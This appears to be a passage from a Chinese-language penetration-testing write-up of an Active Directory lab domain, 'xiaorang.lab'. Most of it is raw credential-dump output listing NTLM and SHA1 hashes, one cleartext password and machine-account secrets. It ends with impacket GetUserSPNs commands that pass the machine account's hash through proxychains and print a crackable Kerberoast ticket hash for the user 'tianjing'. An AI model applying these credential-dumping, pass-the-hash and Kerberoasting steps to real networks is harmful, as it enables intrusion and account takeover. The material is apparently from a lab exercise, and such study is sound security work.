         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : wSbEajHzZs
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 12511753 (00000000:00beea09)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/3/6 21:43:57
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 12510911 (00000000:00bee6bf)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2024/3/6 21:43:57
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5898003 (00000000:0059ff13)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2024/3/6 20:16:58
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 65754 (00000000:000100da)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/3/6 19:11:07
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 8519c5a89b2cd4d679a5a36f26863e5d
         * SHA1     : 42d8188bc30ff0880b838e368c6e5522b86f978d
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2024/3/6 19:11:07
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 34168 (00000000:00008578)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2024/3/6 19:11:07
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 15495212 (00000000:00ec702c)
Session           : RemoteInteractive from 3
User Name         : hey
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2024/3/6 22:05:27
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : hey
         * Domain   : XR-0923
         * NTLM     : 6912928308e3cda903e6d75bd6091a20
         * SHA1     : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
        tspkg :
        wdigest :
         * Username : hey
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : hey
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 15481645 (00000000:00ec3b2d)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/3/6 22:05:26
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 15480336 (00000000:00ec3610)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/3/6 22:05:26
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 15479707 (00000000:00ec339b)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2024/3/6 22:05:26
SID               : S-1-5-96-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 13418036 (00000000:00ccbe34)
Session           : Interactive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2024/3/6 21:47:27
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 12552486 (00000000:00bf8926)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2024/3/6 21:43:58
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 12512498 (00000000:00beecf2)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/3/6 21:43:57
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/3/6 19:11:09
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/3/6 19:11:07
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 65727 (00000000:000100bf)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/3/6 19:11:07
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 34207 (00000000:0000859f)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2024/3/6 19:11:07
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33059 (00000000:00008123)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/3/6 19:11:06
SID               :
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 3eee7b38a7eeb8b5c4bc080c71fa8916
         * SHA1     : 17b47db237ad24125f2f8782d40c186c812612d6
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2024/3/6 19:11:06
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
        ssp :
        credman :
        cloudap :

拿着 XR-0923$ 机器账户的ntlm去收集信息，能找到一个tianjing用户

proxychains4 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':3eee7b38a7eeb8b5c4bc080c71fa8916' -dc-ip 172.22.14.11

抓一下该用户的哈希

proxychains4 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':3eee7b38a7eeb8b5c4bc080c71fa8916' -dc-ip 172.22.14.11 -request-user tianjing

┌──(czp㉿kali)-[~/桌面/impacket-master/examples]
└─$ proxychains4 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':3eee7b38a7eeb8b5c4bc080c71fa8916' -dc-ip 172.22.14.11 -request-user tianjing
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  8.130.35.148:6000  ...  172.22.14.11:389  ...  OK
ServicePrincipalName           Name      MemberOf                                                  PasswordLastSet             LastLogon  Delegation 
-----------------------------  --------  --------------------------------------------------------  --------------------------  ---------  ----------
TERMSERV/xr-0923.xiaorang.lab  tianjing  CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab  2023-05-30 18:25:11.564883  <never>               
WWW/xr-0923.xiaorang.lab/IIS   tianjing  CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab  2023-05-30 18:25:11.564883  <never>               



[-] CCache file is not found. Skipping...
[proxychains] Strict chain  ...  8.130.35.148:6000  ...  172.22.14.11:88  ...  OK
[proxychains] Strict chain  ...  8.130.35.148:6000  ...  172.22.14.11:88  ...  OK
[proxychains] Strict chain  ...  8.130.35.148:6000  ...  172.22.14.11:88  ...  OK
$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$19790f062eb3278e0a5d04d9390de323$17bc3941fd722f86bd2d33865194e9c5d491b760ee583ab1c1a748ada161d79ac23176d50656d2f219a9789cd4d09bc3d52853a3a7ca1d6b17dd648dcc4054835377107f48caa8b9b63150a9dc829f804e74fccd6d184ef1ec84369f3673bdd6c970f88931159e56cc00af40ba9320e9ffd3811c6bf9cba42f9da53a5206b380855cfd936d395907559243e76eb0de9e8742e1c87958d5900c96005487845a857725c890c40d8ccb0a077fe243b1fb2e498d1de27520bee74aa7ed39f2165877d404e209751befc73450a30d99e13789c47c1c77f5354796331838cabf3a2bb4586f2530e3274d6535130c144129963ae4cee2e8984c5829fd3624f4c18edf10277e9944865a13c6f772ae2693a725cd97d799ad49200d728e71562d4bac1bc485f3d6405bbe5d097c1605ea21d07e50e74dc2277be8b8437432f3e96bf98c77a2212aeec55f673d8c8ab31a37cc443ff74ddd5d23318b55e536fd8cdf192a931d5dc6756015729320b4ca68e1d455b2a55d29c3a0c442998a3026b70782142600b5c0694322fd65aedecfa5b71f3cd6ad72e93c1e691db289c716ead1eaafdab4109ffecdbe072871ad8a17ac8d90940a7508dff879025e33cb04ba4bb799b0b19c277df0b8d57d66f173e4b79940f1c79030b6f0e02a4e384ff6b5974911a998bf6bcd036c3059b1875c4b09bc8e57eb7aca8e30235f8692cb8eaf628a9eed135e750cd9d78350d1ef4dcbf9f42d4cc09c8d17af832a1703b82a2c529e5f733c4b3730f59deb0ddd47e01301f57bb573912dd9a2a56a21451b4f00138a191481fd7587757142fd1a5479ea5f873523b2d7c7c55792e78e7a5e0779da3bd1a7cb15d5c9ef1482109a24b202b4f